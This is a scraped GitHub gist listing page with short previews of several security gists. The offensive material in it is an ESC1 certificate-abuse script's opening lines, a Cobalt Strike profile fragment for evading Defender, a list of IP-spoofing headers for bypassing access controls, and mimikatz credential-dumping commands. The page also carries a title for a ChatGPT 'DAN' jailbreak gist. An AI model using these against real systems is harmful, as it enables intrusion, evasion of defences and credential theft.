clod81
/ esc1.ps1
Created
February 23, 2023 19:18
— forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
b4cktr4ck2
/ esc1.ps1
Created
February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
coolaj86
/ ChatGPT-Dan-Jailbreak.md
Last active
September 20, 2024 06:20
miticollo
/ How-to-build-frida-server-for-ios.md
Last active
September 13, 2024 06:37
How to build frida server for iOS jailbroken devices
Here, I'll show you how to compile Frida for both rootfull and rootless jailbreaks.
On Dopamine/Fugu15 Max or palera1n you can add my repo (open the link in your favorite browser on your jailbroken iDevice).
The DEBs you will install are build using the following instructions.
tothi
/ minimal-defender-bypass.profile
Last active
August 15, 2024 20:16
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
I'll spare everyone the rant. This gist will be an all business how to revert to WSL (Windows Subsystem for Linux) on Windows 10 from version 2 back to version 1.
Note that enabling Hyper-V destabilized the (highly managed) system my company provides me. This is probably unique to the image used for the machine and the updates that base has received. So I'm not surprised by the issues people are having with Hyper-V and the Virtual Machine Platform.
My personal Windows virtual machines remain on WSL 1 because I just don't have the energy to deal with all the drama when I've already put in a full shift at work.
kaimi-
/ gist:6b3c99538dce9e3d29ad647b325007c1
Last active
August 25, 2024 08:39
Possible IP Bypass HTTP Headers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |
j0lt-github
/ jsonpickle_vulnerable.txt
Last active
August 7, 2021 13:00
jsonpickle 1.4.2 vulnerable to RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: JsonPickle 1.4.2 allows remote code execution during deserialization of a malicious payload through the decode() function. | |
| VulnerabilityType: CWE-502: Deserialization of Untrusted Data | |
| Vendor of Product: https://github.com/jsonpickle/jsonpickle | |
| Affected Product Code Base: JsonPickle Python Module | |
| Attack Type: Remote | |
| Impact Code execution : True |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
claui
/ install_jtool2.sh
Last active
September 5, 2024 09:34
How to install Jonathan Levin’s jtool2 on macOS 11.0 (Apple Silicon)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copy and paste the following snippet, including brackets, into the Terminal | |
| ( | |
| set -e; | |
| cd "$(mktemp -d)" | |
| curl -LO 'http://www.newosxbook.com/tools/jtool2.tgz' | |
| tar -x -f jtool2.tgz | |
| lipo jtool2 -thin x86_64 -output jtool2.x86_64 | |
| lipo disarm -thin x86_64 -output disarm.x86_64 | |
| sudo mkdir -p /usr/local/bin |
NewerOlder